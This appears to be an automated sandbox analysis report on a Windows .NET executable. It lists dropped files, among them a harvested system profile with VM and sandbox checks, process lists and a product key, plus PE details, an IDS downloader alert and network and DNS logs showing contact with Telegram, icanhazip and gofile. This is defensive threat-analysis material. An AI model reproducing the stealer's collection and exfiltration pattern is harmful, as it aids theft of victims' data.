                                                                                                                                                            Preview:.APP: Office 16 Click-to-Run Extensibility Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008C-0000-0000-0000000FF1CE}...APP: Office 16 Click-to-Run Extensibility Component 64-bit Registration..VERSION: 16.0.16827.20056..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-00DD-0000-1000-0000000FF1CE}...APP: Office 16 Click-to-Run Licensing Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008F-0000-1000-0000000FF1CE}...APP: Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532..VERSION: 14.36.32532..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {0025DD72-A959-45B5-A0A3-7EFEB15A8050}...APP: Java 8 Update 381..VERSION: 8.0.3810.9..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {77924AE4-039E-4CA4-87B4-2F32180381F0}...APP: Adobe Acrobat (64-bit)..VERSION: 23.006.20320..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {AC76BA86-1033-1033-
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):72819
                                                                                                                                                            Entropy (8bit):7.8047047737072575
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:CU3N0VqF+MYyCb9CUeC0ih65Wp2RHBwT1pW+85f8Dz1dePhA5a4rD:PNqqF+MYTb9cih65Wp388D3iag8D
                                                                                                                                                            MD5:796BA6992C3E3156DCD0D3F11DAD94B5
                                                                                                                                                            SHA1:EA6F5991B8D2BE90529BAFAB7056DB30BECDE1DA
                                                                                                                                                            SHA-256:CBDD07B0368720E53B2944199812C5FAA891A2CA97B45C6840D5D88855B25793
                                                                                                                                                            SHA-512:FC180E345D3EC9924B7E17488D001C28B0476A5D1491C245BCD20E432FDE84ABC55BE5AFA08151EE286DFB09FEA66FB1DA69389685EA6E2D15028450190FE951
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):507
                                                                                                                                                            Entropy (8bit):5.406620525110782
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:RFNbwPRbVkb21Exa2Y3PtPjtszJxsWWvdUXyR:3VwP/kbXxaRFPjtQJxsWdS
                                                                                                                                                            MD5:4E386C1A249C14E4B6EBA42BA69C0B6C
                                                                                                                                                            SHA1:9B7B5D157D18F61F4D86ABEEAEA34530FBD3A6B1
                                                                                                                                                            SHA-256:59A48AD0131DCB1BCF5A88C31253C6AEE1459CD3F819D8EA6FDF509D179D66FD
                                                                                                                                                            SHA-512:D295EFC93C534392282E16AC84A897EBD66ADCDC4E5E488DF5C7A9ED445A8DBC3F98F22A74FDFA1AE9FFB78B9D20B90EE0AA27E8C254B639C8EC00DC607281AC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.[IP].External IP: 8.46.123.228.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 910646.System: Microsoft Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: KXODMN.RAM: 4095MB.DATE: 2024-11-29 6:28:24 am.SCREEN: 1280x1024.BATTERY: NoSystemBattery (100%).WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Processes: False.Hosting: False.Antivirus: Windows Defender.
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17835
                                                                                                                                                            Entropy (8bit):5.670240203559194
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:eXAaC23rql9gUEBxwazqSt4XdiBqwVJC1F48sjQAytjWVOwsJ2:ePqHgUEkambIqwm1F48sjQAytjWZW2
                                                                                                                                                            MD5:C0E28C6D0726E302120783E9B9C6E5C8
                                                                                                                                                            SHA1:A5BE121662AD603C44983A97B962EDA02729DBC9
                                                                                                                                                            SHA-256:62A645710A6B945159B57B5CE15A4EE5F14A03E5450077FFF58C78F10A3422CC
                                                                                                                                                            SHA-512:6483E3F2DD5DF8B6FC41F1CCBF3B633E449152044A2CD9CFD33FF8CA3A31440606EB788D522DB2FB777B1F8ECF82EAC2BEFFFE1024E2CEF015BE3206B4504A33
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 6460..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: dllhost..PID: 5164..EXE: C:\Windows\system32\DllHost.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 6996..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 6020..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 6648..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: IfnGMmANjyZVcqPbwihInN..PID: 1704..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQ
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):31
                                                                                                                                                            Entropy (8bit):3.8456631498513816
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:TrY8NQuj8nscDn:Y8NQshM
                                                                                                                                                            MD5:991AAE770DEC8D669F219C991EF185AA
                                                                                                                                                            SHA1:CA63CA3991FD4C2AAB57D8BAFF1B22272789681F
                                                                                                                                                            SHA-256:7F59C7B737DA1C262BBF77911EEC65AE807DB196EA51C7FD0E20B3F3651607D0
                                                                                                                                                            SHA-512:416C01BD586832EB4F922241604BBAA80488839819ED2019A7F4205386445503C611BA36A764286999CF9EAA6B3417B7F2E37AD737F546AA7CE0811C2179C30A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:DPJN2-KRCMC-XRBRJ-KFYBM-CH9C2-4
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13711
                                                                                                                                                            Entropy (8bit):5.601840736862827
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:FFoDoNo1opoAowoZo3i5bez/oZoyByzFMazoqogoAHoNHoaohFoINoNNofokoZH5:e5/yzq/QILpCjf6
                                                                                                                                                            MD5:5F02954184FBA3D0EC2E203E78EE9DD4
                                                                                                                                                            SHA1:0E7155C853DC2A68EBD2778CDBE22A5F86269E3D
                                                                                                                                                            SHA-256:292B13F3BCFC8225C7DB431F8524B08E1702EA385BDB2419F1EE584A32B09DCE
                                                                                                                                                            SHA-512:FEA9B72294003BB17C229046C199D3A968DE45CAAE39C24EA73505A601C553FD329E639A1FD4B471B573B7D7E2BFFF43BDED3204A1D579C754DE5DDE481C051F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6460..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6996..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6020..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6648..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 1704..EXE: C:\Program Files (x86)\fFFLPcmfnMQMaQpJyfQsNknfMcEHKwTiKtJCSeliwTgkUtjn\IfnGMmANjyZVcqPbwihInN.exe..NAME: IfnGMmANjyZVcqPbwihInN..TITLE: New Tab - Google Chrome..PID: 6872..EXE: C:\Program Files (x86)\fFFLPcmfn
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                            Entropy (8bit):4.465627219671438
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:qIXfpi67eLPU9skLmb0b41WSPKaJG8nAgejZMMhA2gX4WABl0uNNdwBCswSbI:fXD941WlLZMM6YFHT+I
                                                                                                                                                            MD5:E82FD1AB2AA9F353E313C14F5FF12D4F
                                                                                                                                                            SHA1:7233181F09305086A1019777F5F7DE8CF1512090
                                                                                                                                                            SHA-256:35D3E6F0492FBE8D0119CABB4D1604CACE1D30E5B40842CF8EBE5A48AB124E93
                                                                                                                                                            SHA-512:6A6C058C93452DEF36E96263B9F70BB7265B5AAD0DEC6A3A4891C343F14D787A440EAD43505C0B6A77D21FA379A3E88A936555C6C2DB4806BA36FE09FB8C929D
                                                                                                                                                            Malicious:false
                                                                                                                                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):7.975024693229074
                                                                                                                                                            TrID:
                                                                                                                                                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                                                            • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                                                            • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.46%
                                                                                                                                                            File name:K6aOw2Jmji.exe
                                                                                                                                                            File size:3'747'840 bytes
                                                                                                                                                            MD5:98a0c65bc0fe05d40971716ffd216519
                                                                                                                                                            SHA1:29725d1d174fb10d919a6f5b5f5ca2d2d83485af
                                                                                                                                                            SHA256:09f6e63d0518f1bebd5b74b8a4ba868d0843bc85922e85aefd94d20405e858d2
                                                                                                                                                            SHA512:eca2ccd20a452f3a1f46a2b880634c779551e03575bc99746a5e3baef63fe3b8579dd8199c42cc6c65f112f70c337ef509efd4c3d84f1b9aa597a03c907f8b64
                                                                                                                                                            SSDEEP:98304:okqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13:okSIlLtzWAXAkuujCPX9YG9he5GnQCAo
                                                                                                                                                            TLSH:B906234077F4465AE5FF6F78E87122109E367A079836D74C2998208C0FB2B85ED26B77
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0...9.............. ....@...... .......................`9...........`...@......@............... .....
                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                            Entrypoint:0x400000
                                                                                                                                                            Entrypoint Section:
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0xEBE8C2F3 [Fri Jun 3 00:40:19 2095 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:
                                                                                                                                                            Instruction
                                                                                                                                                            dec ebp
                                                                                                                                                            pop edx
                                                                                                                                                            nop
                                                                                                                                                            add byte ptr [ebx], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax+eax], al
                                                                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x394000 | 0x1228 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x39382c | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x391848 | 0x391a00 | 61a407b873d556b064687658424eea31 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x394000 | 0x1228 | 0x1400 | 0bbbc31fdf68ff984f237f8ea19f1735 | False | 0.3568359375 | data | 4.832740054505843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x394090 | 0x348 | data | | | 0.43214285714285716
RT_MANIFEST | 0x3943e8 | 0xe3b | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.38649464726873456
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-29T12:28:35.552128+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49738 | 104.16.185.241 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                            Nov 29, 2024 12:28:31.446893930 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:31.566946030 CET8049737104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:31.567471027 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:31.567912102 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:31.687912941 CET8049737104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:32.753259897 CET8049737104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:32.806730032 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:32.819849014 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:32.940220118 CET8049737104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:32.943881035 CET4973780192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:34.292552948 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:34.413655996 CET8049738104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:34.413975000 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:34.414151907 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:34.534512043 CET8049738104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:34.702339888 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:34.702387094 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:34.702677965 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:34.703071117 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:34.703099966 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:35.551759958 CET8049738104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:35.552128077 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:35.672739983 CET8049738104.16.185.241192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:35.672812939 CET4973880192.168.2.4104.16.185.241
                                                                                                                                                            Nov 29, 2024 12:28:36.124805927 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.124897003 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:36.128623962 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:36.128638029 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.128956079 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.135704994 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:36.179336071 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.646615982 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.646699905 CET4434973945.112.123.126192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:36.646846056 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:36.647677898 CET49739443192.168.2.445.112.123.126
                                                                                                                                                            Nov 29, 2024 12:28:37.092710018 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:37.092737913 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:37.092941999 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:37.093343019 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:37.093350887 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.576895952 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.576967955 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.579416037 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.579425097 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.579855919 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.580852032 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.627332926 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.953963995 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.953980923 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.954814911 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.954819918 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956232071 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956243992 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956420898 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956425905 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956547022 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956554890 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956625938 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956634045 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956727982 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956732988 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956813097 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956818104 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.956873894 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.956880093 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957041979 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957041979 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957051992 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957065105 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957115889 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957120895 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957180977 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957187891 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957237959 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957245111 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957297087 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957303047 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957345963 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957350969 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957422972 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957431078 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957513094 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957520008 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957602024 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957607985 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957654953 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957659960 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957731962 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957736969 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957844019 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957854033 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.957935095 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.957942009 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958014011 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958019018 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958059072 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958065033 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958118916 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958132982 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958204985 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958210945 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958291054 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958296061 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958384991 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958391905 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958452940 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958462000 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958503008 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958508015 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:38.958801031 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:38.958833933 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:39.241112947 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:39.290234089 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:40.289835930 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:40.289921045 CET4434974031.14.70.244192.168.2.4
                                                                                                                                                            Nov 29, 2024 12:28:40.289973974 CET49740443192.168.2.431.14.70.244
                                                                                                                                                            Nov 29, 2024 12:28:40.295582056 CET49740443192.168.2.431.14.70.244
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 29, 2024 12:28:26.433357000 CET | 192.168.2.4 | 1.1.1.1 | 0xe0ea | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false |
| Nov 29, 2024 12:28:28.459835052 CET | 192.168.2.4 | 1.1.1.1 | 0x90e4 | Standard query (0) | 54.229.13.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |
| Nov 29, 2024 12:28:28.691040039 CET | 192.168.2.4 | 1.1.1.1 | 0x5ae7 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false |
| Nov 29, 2024 12:28:31.301743031 CET | 192.168.2.4 | 1.1.1.1 | 0x291e | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false |
| Nov 29, 2024 12:28:32.853327036 CET | 192.168.2.4 | 1.1.1.1 | 0x2cc7 | Standard query (0) | 54.229.13.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |
| Nov 29, 2024 12:28:34.560918093 CET | 192.168.2.4 | 1.1.1.1 | 0xd302 | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false |
| Nov 29, 2024 12:28:36.952281952 CET | 192.168.2.4 | 1.1.1.1 | 0x6fe9 | Standard query (0) | store5.gofile.io | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2024 12:28:26.574143887 CET | 1.1.1.1 | 192.168.2.4 | 0xe0ea | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 12:28:26.574143887 CET | 1.1.1.1 | 192.168.2.4 | 0xe0ea | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
